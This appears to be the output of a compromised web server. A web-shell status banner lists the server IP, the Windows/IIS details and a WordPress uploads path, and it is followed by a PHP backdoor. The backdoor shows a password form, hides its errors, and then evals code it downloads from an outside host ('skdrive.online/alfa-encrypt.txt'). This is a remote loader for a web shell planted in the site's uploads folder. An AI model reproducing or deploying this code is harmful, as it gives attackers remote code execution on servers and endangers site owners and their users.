| Server IP : 195.130.67.5 / Your IP : 216.73.217.154 Web Server : Microsoft-IIS/10.0 System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586 User : IUSR ( 0) PHP Version : 7.4.19 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /inetpub/wwwroot/cdc/wp-content/uploads/2017/01/ |
Upload File : |
<?php
session_start();
$password = "authenticated"; // 709ca0198c853fd7fbf3661ed119c2b2
if (!isset($_SESSION['authenticated'])) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
if ($_POST['password'] === $password) {
$_SESSION['authenticated'] = true;
} else {
die("Password salah!");
}
} else {
echo '<form method="POST">
<input type="password" name="password" placeholder="Masukkan user">
<input type="submit" value="Login">
</form>';
exit;
}
}
error_reporting(0);
ini_set('display_errors', 0); ?>
<?php eval(
/**_**/ urldecode("%3f%3e") .
file_get_contents(
/**_**/ urldecode(
/**_**/ "https://skdrive.online/alfa-encrypt.txt"
)
)
); ?>